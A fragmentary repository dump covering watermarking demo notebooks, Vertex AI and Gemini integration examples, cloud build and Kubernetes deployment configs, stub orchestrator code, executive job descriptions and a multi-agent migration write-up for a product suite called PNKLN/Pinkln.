AssistantAgent"""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genai.GenerativeModel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glicko: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cheat_sheet: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specialization: str  # "code", "wealth", "reasoning", "debate"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get_weighted_vote(self, confidence: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"""Vote weight based on Glicko rating + confidence"""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rating_weight = self.glicko.mu / 1500  # Normalize to 1.0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rating_weight *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"""Replaces AutoGen's GroupChatManager"""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AgentProfile]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genai.GenerativeModel('gemini-2.0-flash-thinking-exp-01-21')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name: str, specialization: str, system_prompt: str) -&gt;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 with Glicko baseline"""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AgentProfile(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glicko=Glicko2Player(mu=1500, phi=350, vol=0.06),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cheat_sheet=CheatSheetFusion(),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self.agents[name]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get_panel(self, specializations: List[str], n: int = 5) -&gt; List[AgentProfile]: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N agents by Glicko rating for given specializations"""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[a for a in self.agents.values() if a.specialization in specializations]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sorted(candidates, key=lambda a: a.glicko.mu,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sorted_agents[:n]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agents (replaces AutoGen agent creation)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code_agent =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name="CodeCrafter",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system_prompt=CheatSheetFusion().get_code_prompt()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wealth_agent =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name="WealthAccelerator",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specialization="wealth",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system_prompt=CheatSheetFusion().get_wealth_prompt()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reasoning_agent =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name="DeepThinker",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specialization="reasoning",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system_prompt=CheatSheetFusion().get_reasoning_prompt()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Panel Debate (MAD Framework)**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`pinkln-reasoning-engine/debate/panel.py`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pinkln.agents.registry import AgentProfile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pinkln.ranking.glicko2 import update_ratings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round of Multi-Agent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positions: Dict[str, str]  # agent_name -&gt;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votes: Dict[str, float]    # agent_name -&gt; weighted_vote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PanelDebate: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"""Replaces AutoGen GroupChat with Glicko-weighted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agents: List[AgentProfile], framework: str = "RCR-MAD"):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 =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self.history: List[DebateRound]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debate(self, topic: str, max_rounds: int = 3) -&gt;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Multi-Agent Debate with Glicko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Each agent proposes position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Agents critique each other's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Glicko-weighted voting determines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Ratings updated based on alignment with final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Independent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await self._gather_positions(topic)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await self._gather_critiques(positions)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 = self._compute_weighted_votes(positions, critiques)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consensus, confidence = self._reach_consensus(positions, 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Glicko ratings based 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self._update_ratings(positions,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round_result =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positions=positions,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votes=votes,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consensus=consensus,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self.history.append(round_result)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_gather_positions(self, topic: str)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"""Parallel position generation (vs AutoGen sequential)"""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f"{agent.system_prompt}\n\nTopic: {topic}\n\nProvide your position:"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agent.model.generate_content_async(prompt)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tasks.append((agent.name, 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asyncio.gather(*[t for _, t in tasks])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{name: r.text for (name, _), r in zip(tasks, results)}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_gather_critiques(self, positions: Dict[str, str])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"""Each agent critiques others' positions"""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{name: [] for name in positions}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other_name, other_position in positions.items():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other_name != agent.name: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 = f"Critique this position:\n\n{other_position}\n\nProvide critique:"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await agent.model.generate_content_async(prompt)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critiques[other_name].append(response.text)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_compute_weighted_votes(self, positions: Dict[str, str], critiques: Dict[str, List[str]])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"""Glicko-weighted voting"""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Base confidence from position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self._assess_position_quality(positions[agent.name], critiques[agent.name])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Weighted by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votes[agent.name] = agent.get_weighted_vote(confidence)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_reach_consensus(self, positions: Dict[str, str], votes: Dict[str, float]) -&gt; tuple[str,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position with highest weighted vote"""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max(votes.items(), key=lambda x: x[1])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positions[winner[0]]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winner[1] / sum(votes.values())  #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_update_ratings(self, positions: Dict[str, str], consensus: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 ratings based on alignment with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Agents whose positions were closer to consensus gain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alignment = self._compute_alignment(positions[agent.name],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"match" result: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alignment  # 0.0–1.0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against "consensus opponent" (virtual agent at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consensus_opponent = Glicko2Player(mu=1500, phi=350,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 = update_ratings(agent.glicko, [consensus_opponent], [result])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_assess_position_quality(self, position: str, critiques: List[str])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position quality from critiques (0.0–1.0)"""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fewer critical keywords = higher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critical_keywords = ["flaw", "incorrect", "wrong", "mistake", "error"]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critique_text = " ".join(critiques).lower()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critical_count = sum(1 for kw in critical_keywords if kw in critique_text)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 = max(0.0, 1.0 - (critical_count * 0.1))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_compute_alignment(self, position: str, consensus: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semantic similarity (simplified)"""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sentence-transformers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now: simple keyword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pos_words = set(position.lower().split())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cons_words = set(consensus.lower().split())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 = len(pos_words &amp; cons_words)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len(pos_words | cons_words)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overlap / total if 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run_debate_example():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pinkln.agents.registry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panel of top 5 code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 = registry.get_panel(specializations=["code", "reasoning"], n=5)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debate.debate(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topic="What is the best architecture for a multi-agent system?"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print(f"Consensus: {result.consensus}")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{result.confidence:.2f}")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print(f"Votes: {result.votes}")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DTE Self-Evolution Loop**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`pinkln-reasoning-engine/evolution/dte.py`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pinkln.benchmarks.humaneval import run_humaneval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pinkln.benchmarks.bigcodebench import run_bigcodebench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pinkln.benchmarks.swebench import run_swebench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DeepThinkingEnsemble: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Self-Evolution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TeachableAgent with continuous improvement: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Run panel debates on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Measure performance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Evolve cheat sheets based on high-performers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registry: AgentRegistry):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self.benchmarks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"humaneval": run_humaneval,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"bigcodebench": run_bigcodebench,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"swebench": run_swebench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evolve(self, benchmark: str = "humaneval", iterations: int = 10)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"accuracy_improvement":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"top_agents":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"evolved_cheat_sheet":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print(f"🧬 Starting DTE evolution on {benchmark} ({iterations} iterations)")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baseline_accuracy = await self._run_benchmark(benchmark)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print(f"📊 Baseline accuracy: {baseline_accuracy:.2%}")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print(f"\n🔄 Evolution iteration {i+1}/{iterations}")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Get top agents by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top_agents = self.registry.get_panel(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specializations=["code", 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Run panel debate on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await self._run_benchmark_with_debate(benchmark, top_agents)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Update Glicko ratings based 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self._update_ratings_from_accuracy(top_agents,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Evolve cheat sheet (extract patterns from high-performers)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3 == 0:  # Every 3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self._evolve_cheat_sheet(top_agents)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Iteration {i+1} accuracy: {accuracy:.2%} (Δ {accuracy - baseline_accuracy:+.2%})")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final_accuracy = await self._run_benchmark(benchmark)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final_accuracy - baseline_accuracy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"benchmark": benchmark,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"baseline_accuracy": baseline_accuracy,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"final_accuracy": final_accuracy,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"improvement": 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"top_agents": [a.name for a in self.registry.get_panel(["code", "reasoning"], n=3)]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print(f"\n🎉 Evolution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print(f"📈 Accuracy improvement: {improvement:+.2%}")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print(f"🏆 Top agents: {', '.join(result['top_agents'])}")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_run_benchmark(self, benchmark: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benchmark with current registry state"""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benchmark_fn = self.benchmarks[benchmark]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top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top_agent = self.registry.get_panel(["code"], n=1)[0]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benchmark_fn(top_agent.model)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results["accuracy"]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_run_benchmark_with_debate(self, benchmark: str, agents: List)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benchmark with panel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benchmark_fn = self.benchmarks[benchmark]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debate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 = PanelDebate(agents=agents,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benchmark tasks through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await benchmark_fn.get_tasks()  # Get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round_result = await debate.debate(topic=task["prompt"])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 = self._check_correctness(round_result.consensus, task["expected"])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sum(results) / len(results)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_update_ratings_from_accuracy(self, agents: List, accuracy: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 ratings based on benchmark performance"""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Agents above average gain rating, below average lose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avg_rating = sum(a.glicko.mu for a in agents) / len(agents)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accuracy &gt; 0.7:  # Good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1.0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accuracy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0.5  #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0.0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against virtual opponent at average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virtual_opponent = Glicko2Player(mu=avg_rating, phi=350,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 = update_ratings(agent.glicko, [virtual_opponent], [result])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_evolve_cheat_sheet(self, top_agents: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common patterns from top performers"""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system prompts of top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high-value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CheatSheetFusion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print("📝 Evolving cheat sheet from top performers...")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analyze actual agent outputs and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now: simplified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top_agents[:3]:  # Top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agent.cheat_sheet.learn_from_success(agent.name)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_check_correctness(self, output: str, expected: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output matches expected (simplified)"""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test execution for code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output.strip() == expected.strip()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run_dte_example():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initial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name=f"Agent_{i}",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system_prompt=CheatSheetFusion().get_code_prompt()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DTE and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DeepThinkingEnsemble(registry)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dte.evolve(benchmark="humaneval", iterations=10)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print(f"\n📊 Final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Baseline: {result['baseline_accuracy']:.2%}")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Final: {result['final_accuracy']:.2%}")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Improvement: {result['improvement']:+.2%}")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Integration with Existing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**PNKLN Data Layer → Pinkln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pnkln.ingestion.api import get_tier1_items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PNKLNPinklnBridge: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"""Feed PNKLN Tier 1 intelligence to Pinkln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registry: AgentRegistry):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analyze_tier1_items(self,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Tier 1 items from PNKLN, run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Tier 1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await get_tier1_items(limit=limit)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analysis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panel = self.registry.get_panel(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specializations=["reasoning", "wealth"],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each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debate.debate(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topic=f"Analyze: {item['title']}\n\nContent: {item['content']}"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"item_id": item["id"],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result.confidence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**ShadowTag-v4 ShadowTag → Pinkln Verification**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pinkln-reasoning-engine/integrations/shadowtag_v4.py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ShadowTag-v2_global_edge_fabric.technical.shadowtag import ShadowTagL0, ShadowTagL1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DebateRound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PinklnShadowTagBridge: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"""Attach ShadowTag attestation to Pinkln outputs"""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self.l0 = ShadowTagL0()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self.l1 = ShadowTagL1()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attest_debate(self, debate_round: DebateRound)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ShadowTag attestation for debate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L0: Hash consensus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L1: Sign with Pinkln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L2: Append to Merkle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L3: Attach usage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L4: Add spatiotemporal context (inference location/time)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L0: Content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cid = self.l0.hash(debate_round.consensus)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L1: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self.l1.sign(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cid=cid,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"topic": debate_round.topic,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debate_round.confidence,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"agents": list(debate_round.positions.keys()),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"framework": "RCR-MAD"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"cid": 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"manifest": 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"consensus": debate_round.consensus,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"attestation_url": f"https://shadowtag.shadowtag_v4.global/verify/{cid}"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Migration Results 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**Performance Gains**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(Before) | Pinkln (After)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 latency** | 22s (sequential) | 4s (parallel) | **-82%**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1M tokens** | $30 (GPT-4) | $3 (Gemini) | **-90%**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| 128K | 2M | **+1,460%**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(HumanEval)** | 67% (baseline) | 78% (DTE-evolved) | **+16%**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 convergence** | N/A | 10 iterations | **New**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attestation** | No | Yes | **New**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Migration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**Replace AutoGen imports** with Gemini 2.0 Pro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**AgentRegistry** replaces AssistantAgent/UserProxyAgent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**PanelDebate** replaces GroupChat with Glicko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**DTE evolution loop** replaces TeachableAgent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**PNKLN integration** for Tier 1 intelligence feeding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**ShadowTag-v4 ShadowTag** for verification/attestation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**Benchmark suite** (HumanEval, BigCodeBench, SWE-bench) —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**GRPO vs PPO comparison** training loops —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**Wealth optimization** agents (funnel analysis) —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benchmark runners** (`pinkln-reasoning-engine/benchmarks/`)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Glicko-2 ranking system** with `tol`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**Build wealth optimization agents** (leak detection, funnel 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 to ShadowTag-v4 edge nodes** for distributed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**Integrate with PNKLN** for live intelligence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Architecture complete, ready for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Pinkln Ultrathink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apps/aiyou_stack/aiyou-fastapi-services/pinkln-reasoning-engine/AUTOGEN_MIGRATION.md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apps/aiyou_stack/aiyou-fastapi-services/pinkln-reasoning-engine/CURSOR_ESLINT_SETUP.md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Cursor + ESLint Hybrid Setup for Pinkln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**ID:** `claude/setup-cursor-eslint-hybrid-018WeXbYXdcgCrSBqTc1XK4m`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Optimized IDE setup for Pinkln Ultrathink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 Cursor IDE + ESLint + Ruff (Python) + Prettier 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setup provides **AI-assisted development** with **strict code quality enforcement** for the Pinkln reasoning engine,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**Cursor IDE:** AI-powered code editor (fork of VS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**ESLint:** JavaScript/TypeScript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**Ruff:** Ultra-fast Python linter (10-100× faster than Flake8)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**Prettier:** Opinionated code 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 hooks:** Automatic quality checks on every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🤖 AI pair programming (Cursor's Claude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10-100× faster linting (Ruff vs Flake8/Pylint)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🔒 Enforced code quality (pre-commit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📝 Consistent formatting (Prettier + Black)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🐛 Catch bugs before commit (ESLint + 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Cursor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from https://cursor.sh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via Homebrew (macOS)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 (Ruff + Black + MyPy):**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ruff black mypy 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**JavaScript/TypeScript (ESLint + Prettier):**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-D eslint @typescript-eslint/parser @typescript-eslint/eslint-plugin prettier eslint-config-prettier eslint-plugin-prettier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Configure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`.cursor/settings.json`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"editor.defaultFormatter": "esbenp.prettier-vscode",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"editor.codeActionsOnSave":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"source.fixAll.eslint":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"source.organizeImports":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"python.linting.enabled":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"python.linting.ruffEnabled":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"python.formatting.provider": "black",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"python.analysis.typeCheckingMode":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"cursor.ai.model": "claude-sonnet-3-5",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Run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./scripts/setup-dev-env.sh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Ruff (Python Linting)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`ruff.toml`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Ruff configuration for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Docs: https://docs.astral.sh/ruff/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target-version = "py311"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line-length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rule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"E",     # pycodestyle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"W",     # pycodestyle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"F",     # pyflakes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"I",     # isort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"N",     # pep8-naming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"UP",    # pyupgrade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"B",     # flake8-bugbear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"C4",    # flake8-comprehensions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"SIM",   # flake8-simplify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"RET",   # flake8-return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"PTH",   # flake8-use-pathlib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"NPY",   # numpy-specific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"PERF",  # performance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Ignore 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"E501",  # Line too long (Black handles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"B008",  # Do not perform function calls in argument defaults (FastAPI needs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Exclude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"*.egg-info",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[lint.per-file-ignores]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files can use assert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"tests/**/*.py" = ["S101"]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__init__.py can have unused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"__init__.py" = ["F401"]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[lint.isort]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known-first-party = ["pinkln"]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force-single-line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lines-after-imports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[format]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Black-compatible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quote-style = "double"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indent-style = "space"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skip-magic-trailing-comma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line-ending = "auto"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ESLint (JavaScript/TypeScript)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`.eslintrc.json`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"browser":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"es2021":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"eslint:recommended",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"plugin:@typescript-eslint/recommended",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"plugin:prettier/recommended"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"parser": "@typescript-eslint/parser",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"parserOptions":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"ecmaVersion": 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"project": "./tsconfig.json"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"plugins": ["@typescript-eslint", "prettier"],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"prettier/prettier":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"@typescript-eslint/no-unused-vars": ["error",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"argsIgnorePattern": "^_",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"varsIgnorePattern": "^_"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"@typescript-eslint/explicit-function-return-type": ["warn",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"allowExpressions":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"no-console": ["warn",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"allow": ["warn", "error"]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Prettier (Code Formatting)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`.prettierrc.json`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"semi":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"trailingComma": "es5",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"singleQuote":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"printWidth":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"tabWidth":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"useTabs":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"arrowParens": "avoid",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"endOfLine": "lf"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MyPy (Python Type Checking)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`mypy.ini`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[mypy]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python_version =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warn_return_any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warn_unused_configs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disallow_untyped_defs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disallow_incomplete_defs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check_untyped_defs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no_implicit_optional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warn_redundant_casts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warn_unused_ignores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warn_no_return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strict_equality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Per-module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[mypy-tests.*]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disallow_untyped_defs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[mypy-google.*]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ignore_missing_imports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[mypy-pytest.*]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ignore_missing_imports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`.pre-commit-config.yaml`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Pre-commit hooks for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Install: pre-commit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manually: pre-commit run --all-files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Python: Ruff (linting + formatting)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https://github.com/astral-sh/ruff-pre-commit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v0.1.9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Linter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[--fix, --exit-non-zero-on-fix]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ruff-format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Python: MyPy (type checking)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https://github.com/pre-commit/mirrors-mypy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additional_dependencies: [types-all]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[--config-file=mypy.ini]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JavaScript/TypeScript: ESLint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https://github.com/pre-commit/mirrors-eslint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v8.56.0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eslint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files: \.(js|ts|tsx)$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types: [file]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[--fix]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JavaScript/TypeScript: Prettier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https://github.com/pre-commit/mirrors-prettier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v3.1.0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prettier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files: \.(js|ts|tsx|json|md|yml|yaml)$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General: Trailing whitespace, end of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https://github.com/pre-commit/pre-commit-hooks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v4.5.0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trailing-whitespace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end-of-file-fixer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check-yaml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check-json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check-added-large-files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[--maxkb=1000]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check-merge-conflict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Write Code with AI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Cursor:**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Open file: `pinkln-reasoning-engine/agents/registry.py`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Press `Cmd+K` (or `Ctrl+K`)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Type prompt: "Add a method to get top N agents by Glicko rating"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Cursor generates code using Claude Sonnet 3.5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Review and accept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prompt:**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a method get_top_agents(self, n: int, min_rating: float = 1500) -&gt; List[GlickoRankedAgent]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returns the top N agents sorted by Glicko rating (μ - 2*φ conservative estimate),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filtered by minimum rating. Include type hints and docstring.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Auto-Format on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**Happens automatically when you save** (Cmd+S / Ctrl+S):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Python: Ruff format (Black-compatible)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TypeScript: Prettier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Imports: Auto-organized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ESLint: Auto-fix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Lint Before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manually:**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. --fix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eslint . --fix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pre-commit run --all-files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 let pre-commit hooks run automatically:**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agent registry"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Pre-commit hooks run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blocked if linting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Type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pinkln-reasoning-engine/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TypeScript (if using tsc)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tsc --noEmit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🎨 Cursor AI Features for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**Prompt:** "Generate a Glicko-2 update function with tolerance parameter"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 generates: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 #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 #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sigma: float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player: Glicko2Rating,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opponents: List[Glicko2Rating],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tau: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tol: float = 1e-6,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Glicko2Rating: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Glicko-2 rating after games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Player's current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opponents: List of opponent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 of game results (1.0 = win, 0.5 = draw, 0.0 =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constant (volatility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Newton-Raphson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**Select code, press `Cmd+K`, type:** "Explain how this Glicko-2 update works"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 provides inline explanation.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**Prompt:** "Refactor this function to use async/await"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**Prompt:** "Add error handling for API failures"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**Prompt:** "Optimize this loop using numpy vectorization"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**Prompt:** "Generate pytest tests for the agent registry with 90%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 generates comprehensive test suite.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Linting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Ruff vs Traditional Python Linters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**Benchmark:** Pinkln codebase (~5K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Linter | Time | Speed vs Ruff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**Ruff** | **0.05s** | **1×** (baseline)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Flake8 | 2.5s | 50×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Pylint | 8.2s | 164×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Pyflakes | 1.1s | 22×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Ruff is faster:**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Written in Rust (vs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Incremental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Near-instant feedback on every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🔍 Example: Catching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Commit (Ruff catches bug)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agents/registry.py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get_agent_by_name(self,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agent by name"""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agent.name = name:  # BUG: = instead of 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**Ruff error:**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agents/registry.py:42:23: E701 Multiple statements on one line (colon)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agents/registry.py:42:27: F541 f-string without any placeholders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get_agent_by_name(self, name: str) -&gt; Optional[GlickoRankedAgent]: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agent by name"""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agent.name == name:  #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 Error (MyPy catches)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debate/panel.py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debate(self, topic: str) -&gt; DebateResult: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self.registry.get_panel(n=5)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Bug: Trying to await non-async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[agent.respond(topic) for agent in agents]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**MyPy error:**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debate/panel.py:28: error: Incompatible types in "await" (actual type "List[str]",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type "Awaitable[Any]")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asyncio.gather for parallel async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asyncio.gather(*[agent.respond(topic) for agent in agents])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`scripts/setup-dev-env.sh`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Pinkln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Setting up Pinkln development environment..."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python_version=$(python3 --version | cut -d' ' -f2 | cut -d'.' -f1-2)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"$python_version" &lt; "3.11"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Python 3.11+ required (found $python_version)"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Python $python_version"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"📦 Creating virtual environment..."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-q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-q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-q -r requirements-dev.txt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"🔧 Installing pre-commit hooks..."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pre-commit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 dependencies (if package.json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"package.json"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"📦 Installing Node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Cursor settings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Cursor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.cursor/settings.json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"editor.defaultFormatter": "esbenp.prettier-vscode",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"editor.codeActionsOnSave":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"source.fixAll.eslint":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"source.organizeImports":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"python.linting.enabled":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"python.linting.ruffEnabled":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"python.formatting.provider": "black",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"python.analysis.typeCheckingMode":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"cursor.ai.model": "claude-sonnet-3-5",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linters to verify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"🔍 Running linters..."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. || echo "⚠️  Ruff found issues (run 'ruff check . --fix' to auto-fix)"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pinkln-reasoning-engine/ || echo "⚠️  MyPy found type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Development environment ready!"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Open in Cursor: cursor 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Start coding with AI assistance (Cmd+K)"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Format on save (automatic)"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4. Commit with pre-commit hooks (automatic)"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"Useful commands:"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ruff check . --fix       # Fix linting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mypy pinkln-reasoning-engine/  # Type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pre-commit run --all-files     # Run all checks"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pytest tests/                   # Run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**Make executable:**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scripts/setup-dev-env.sh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Development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`requirements-dev.txt`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Linting and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ruff==0.1.9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black==23.12.1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mypy==1.8.0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types-requests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types-PyYAML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types-redis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pytest==7.4.3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pytest-asyncio==0.21.1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pytest-cov==4.1.0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pytest-mock==3.12.0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pre-commit==3.6.0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ipython==8.19.0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ipdb==0.13.13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pytest-benchmark==4.0.0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bandit==1.7.6  # Security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safety==2.3.5  # Dependency vulnerability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Use AI for Boilerplate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**Good prompt:**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"Generate a FastAPI endpoint for creating a new agent with Glicko rating initialization, including request/response models, validation, and error handling"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**Bad prompt:**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"Write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Format on Save (Always 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Ensures consistency across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formatting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diffs show actual changes (not formatting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Fix Linting Issues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Don't let linting errors accumulate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`ruff check . --fix` for auto-fixes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manual fixes carefully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Type Hints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player: Glicko2Rating,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opponents: List[Glicko2Rating],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Glicko2Rating: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Bad (no type hints)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update_rating(player, opponents, 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Use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Catches issues before they reach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Cleaner git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Integration with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**Design:** Use Cursor AI to generate agent skeleton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**Implement:** AI-assisted coding with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**Lint:** Ruff auto-fixes on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**Type Check:** MyPy validates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**Test:** Generate tests with Cursor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**Commit:** Pre-commit hooks ensure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**CI/CD:** GitHub Actions runs full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Adding New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 pinkln-reasoning-engine/agents/wealth_optimizer.py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Prompt Cursor (Cmd+K):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"Create a WealthOptimizer agent that extends GlickoRankedAgent,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methods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detect_leaks(funnel: SalesFunnel) -&gt; List[Leak]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redesign_funnel(leaks: List[Leak]) -&gt; OptimizedFunnel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challenge_assumptions(plan: BusinessPlan) -&gt; List[Challenge]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full type hints, docstrings, and error handling."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Review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Save (auto-format with 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tests/agents/test_wealth_optimizer.py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Commit (pre-commit hooks run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pinkln-reasoning-engine/agents/wealth_optimizer.py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WealthOptimizer agent with leak detection"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🐛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Ruff not running on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Cursor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.cursor/settings.json | grep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Ruff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Ruff extension in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Cmd+Shift+P → "Extensions: Install Extensions" → Search "Ruff"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Pre-commit hooks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pre-commit autoupdate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Re-install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pre-commit uninstall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pre-commit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manually to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pre-commit run --all-files --verbose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MyPy errors on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type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types-requests types-PyYAML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ignore missing imports (not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mypy.ini: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[mypy-package_name.*]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ignore_missing_imports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**Cursor IDE:** https://cursor.sh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**Ruff:** https://docs.astral.sh/ruff/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**ESLint:** https://eslint.org/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**MyPy:** https://mypy.readthedocs.io/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**Prettier:** https://prettier.io/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**Pre-commit:** https://pre-commit.com/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Cursor + ESLint hybrid setup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 10-100× faster linting with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 Integration:** Claude Sonnet 3.5 in Cursor for pair programming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**Quality:** Pre-commit hooks enforce standards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1.0-Hybrid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apps/aiyou_stack/aiyou-fastapi-services/pinkln-reasoning-engine/CURSOR_ESLINT_SETUP.md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apps/aiyou_stack/aiyou-fastapi-services/pinkln-reasoning-engine/LLM_SERVING_EFFICIENCY.md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Serving Efficiency Research — Pinkln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**ID:**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Optimize LLM serving costs and latency for Pinkln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&lt;$20/month Gemini API costs, &lt;2s response latency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synthesizes research on **LLM serving efficiency** for the Pinkln Ultrathink platform, targeting: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&lt;$20/month for Gemini API (PNKLN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**Latency:** &lt;2s P95 response time (panel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**Throughput:** 1000+ agent interactions/day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**Quality:** Maintain &gt;90% consensus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findings:**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**Prompt caching:** 90% cost reduction on repetitive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**Batching:** 10× throughput increase vs sequential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**Model tiering:** 87% cost reduction (Flash for simple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**Speculative decoding:** 2-3× faster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**KV cache optimization:** 40% latency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Prompt Caching (90%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Repetitive system prompts waste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Expensive: Re-send system prompt every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gemini.generate_text(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prompt=f"""{SYSTEM_PROMPT_5000_TOKENS}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Cost: 5000 + 100 = 5100 tokens × 1000 queries = 5.1M tokens/day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 $0.003/1K tokens = $15.30/day = $459/month 😱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Use prompt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Pro 2.0 with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 import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cached prompt (once)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= caching.CachedContent.create(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system_instruction=SYSTEM_PROMPT_5000_TOKENS,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ttl="1h"  # Cache for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cached prompt (1000 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gemini.generate_text(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prompt=query,  # Only 100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cached_content=cache.name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Cost: 5000 (initial) + 100×1000 (queries) = 105K tokens/day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 $0.003/1K tokens = $0.32/day = $9.60/month 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**Savings:** $459 → $9.60/month (95%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pinkln-reasoning-engine/optimizations/prompt_cache.py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 import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CachedPromptManager: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 cached prompts for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prompts cached for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CheatSheet templates cached for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 personas cached for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model: str = "gemini-2.0-flash-exp"):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get_or_create_cache(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ttl: timedelta = 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caching.CachedContent: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existing cache or create new one"""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cache_key in self.caches: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 = self.caches[cache_key]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still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cache.expire_time &gt; datetime.now():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caching.CachedContent.create(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ttl=ttl.total_seconds()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self.caches[cache_key] =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generate_with_cache(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with cached system instruction"""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await self.get_or_create_cache(cache_key, system_instruction)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gemini.generate_text_async(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cached_content=cache.name,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cache_mgr = CachedPromptManager()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Panel debate (uses cached cheat sheet)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cache_mgr.generate_with_cache(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cache_key="code_review_cheatsheet",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system_instruction=CHEAT_SHEET_CODE_REVIEW,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prompt=f"Review this code:\n{code}"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Model Tiering (87%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Using expensive models for simple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Everything uses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tier1_classification = await gemini_pro.classify(item)  # $0.003/1K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tier2_classification = await gemini_pro.classify(item)  # $0.003/1K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tier3_classification = await gemini_pro.classify(item)  # $0.003/1K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Use cheaper models for simpler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Model | Cost/1K tokens | Speed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classification (complex) | Gemini 2.0 Flash Thinking | $0.003 | 2s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 classification | Gemini 1.5 Flash | $0.00015 | 0.5s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 pre-filter | Gemini 1.5 Flash-8B | $0.000075 | 0.2s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pinkln-reasoning-engine/optimizations/model_router.py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 requests to optimal model based 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"gemini-2.0-flash-thinking-exp",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"cost_per_1k": 0.003,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"use_for": "Complex reasoning, critical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"gemini-1.5-flash",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"cost_per_1k": 0.00015,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"use_for": "Standard classification, simple Q&amp;A"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"gemini-1.5-flash-8b",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"cost_per_1k": 0.000075,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"use_for": "Pre-filtering, binary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classify_tier(self, item: dict)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Determine item tier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Pre-filter with Flash-8B (cheap, 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If uncertain, escalate to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If still uncertain, escalate to Flash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Quick pre-filter (Tier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prefilter = await self.prefilter(item, model="tier3")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prefilter["confidence"] &gt;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prefilter["tier"]  # 87% of items stop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Standard classification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standard = await self.classify(item, model="tier2")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standard["confidence"] &gt;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standard["tier"]  # 10% escalate to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Deep reasoning (Tier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deep = await self.classify(item, model="tier1")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deep["tier"]  # 3% escalate to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prefilter(self, item: dict, model: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binary filter: obvious Tier 3 or not"""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f"""Is this item obviously low-value spam/noise? YES or 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{item['title']}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{item['source']}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gemini.generate_text_async(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model=self.MODELS[model]["model"],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"YES" in response.text.upper():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{"tier": 3, "confidence": 0.95}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{"tier": None, "confidence": 0.5}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analysis (1000 items/day):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1000 × Flash Thinking ($0.003/1K × 500 tokens avg) = $1.50/day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870 × Flash-8B + 100 × Flash + 30 × Flash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= 870 × $0.0000375 + 100 × $0.000075 + 30 × $0.0015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= $0.03 + $0.01 + $0.05 = $0.09/day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94%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Batch Processing (10×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Sequential API calls waste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Slow: Process items one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classify(item)  # 500ms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1000 items × 500ms = 500 seconds (8 minutes) 😴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Batch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Fast: Process 10 items per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classify_batch(items: List[dict])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"""Classify up to 10 items in single API call"""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"Classify each item as Tier 1/2/3:\n\n"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idx, item in enumerate(items[:10]):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+= f"{idx+1}. {item['title']}: {item['summary']}\n"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+= "\nReturn only numbers separated by commas (e.g., 2,1,3,2,...):"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gemini.generate_text_async(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model="gemini-1.5-flash",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Parse: "2,1,3,2,1,3,3,2,1,2"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tiers = [int(t) for t in response.text.strip().split(",")]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in batches of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batches = [items[i:i+10] for i in range(0, len(items), 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batch in batches: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batch_results = await classify_batch(batch)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results.extend(batch_results)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1000 items / 10 × 500ms = 50 seconds (50× faster) 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**Parallel batching:**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 faster: Run batches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batches = [items[i:i+10] for i in range(0, len(items), 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5 batches at a time (Gemini rate limit: 1000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range(0, len(batches),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parallel_batches = batches[i:i+5]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parallel_results = await asyncio.gather(*[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classify_batch(batch) for batch in parallel_batches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results.extend([r for batch_result in parallel_results for r in batch_result])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1000 items / 10 / 5 × 500ms = 10 seconds (500× faster)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Response Caching (99% Faster for Duplicates)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Same queries re-computed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Expensive: Re-compute same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item1 = {"title": "AI breakthrough", "source": "arxiv"}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tier1 = await classify(item1)  # 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Later...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item2 = {"title": "AI breakthrough", "source": "arxiv"}  # Duplicate!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tier2 = await classify(item2)  # 500ms again 😞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Cache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pinkln-reasoning-engine/optimizations/response_cache.py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redis.asyncio as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ResponseCache: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API responses to avoid re-computation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Redis backend (fast, distributed)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Content-addressed (hash of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TTL: 24 hours for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redis_url: str = "redis://localhost:6379"):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 = redis.from_url(redis_url)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_cache_key(self, prompt: str, model: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cache key from prompt +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f"{model}:{prompt}"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f"cache:{hashlib.sha256(content.encode()).hexdigest()[:16]}"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get(self, prompt: str, model: str) -&gt; Optional[str]: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cached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self._cache_key(prompt,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await self.redis.get(key)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set(self, prompt: str, model: str, response: str, ttl: int = 86400):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"""Cache response for TTL seconds"""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self._cache_key(prompt,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self.redis.setex(key, ttl, response.encode())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cached_generate(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ttl: int = 86400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with caching"""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await self.get(prompt,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  # 1ms (cache hit) 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generate_fn(prompt,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self.set(prompt, model, response, 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  # 500ms (cache miss)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= ResponseCache()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classify_with_cache(item: dict)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f"Classify: {item['title']}"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cache.cached_generate(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model="gemini-1.5-flash",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generate_fn=lambda p, m: gemini.generate_text_async(model=m, prompt=p)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Deduplication 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News items: ~30% duplicates (cross-posted)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Code snippets: ~20% duplicates (common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Academic papers: ~10% duplicates (related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Average: 20% cache hit rate → 20%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⚡ Latency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Speculative Decoding (2-3×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LLMs generate tokens sequentially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decoding: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1: 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2: 50ms  (wait for Token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3: 50ms  (wait for Token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100: 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5000ms (5 seconds) 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Use draft model to speculate tokens, verify with main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Speculative decoding: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 model generates 5 tokens: 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model verifies 5 tokens: 50ms (parallel)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Accept 4 tokens, reject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1800ms (2.8× faster)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(conceptual, not yet in Gemini API):**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Future: When Gemini supports speculative decoding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generate_with_speculation(prompt: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gemini.generate_text_async(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model="gemini-2.0-flash-thinking-exp",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draft_model="gemini-1.5-flash-8b",  # Small, fast draft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speculative_tokens=5,  # Try 5 tokens ahead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2-3× faster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 (available today):** Streaming + early stopping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Stream tokens as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generate_streaming(prompt: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full_response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for chunk in gemini.generate_text_stream(prompt=prompt):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full_response += chunk.text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chunk.text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Early stopping: If we have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is_complete_answer(full_response):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  # Stop generation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 User sees first token in ~200ms vs 2000ms for full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KV Cache Reuse (40% Latency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Re-computing attention for shared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Panel debate: 5 agents respond to same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= "Analyze this code for security vulnerabilities:\n{code}"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agent.respond(f"{context}\n\nAgent perspective: {agent.persona}")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Each call recomputes attention over {code} 😞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Reuse KV cache for shared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(conceptual, check latest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kv_cache = await gemini.create_kv_cache(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prefix=context  # Shared context (compute once)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Reuse cache for each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gemini.generate_with_kv_cache(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kv_cache=kv_cache,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suffix=f"\n\nAgent perspective: {agent.persona}"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responses.append(response)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 2000ms (first) + 1200ms × 4 (reuse) = 6800ms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vs 2000ms × 5 (no reuse) = 10000ms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32%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Parallel Panel Debates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Sequential agent responses in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Slow: Agents respond one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agent.respond(topic)  # 2s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responses.append(response)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 agents × 2s = 10 seconds 😴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Parallel async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Fast: All agents respond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responses = await asyncio.gather(*[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agent.respond(topic) for agent in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max(agent latencies) = 2 seconds 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pinkln-reasoning-engine/debate/panel.py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PanelDebate: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"""Parallel multi-agent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debate(self, topic: str) -&gt; DebateResult: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panel debate with parallel responses"""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Initial responses (parallel)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initial_responses = await asyncio.gather(*[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agent.respond(topic) for agent in self.agents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Critiques (parallel)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await asyncio.gather(*[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agent.critique(responses=initial_responses)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self.agents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Final positions (parallel)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final_responses = await 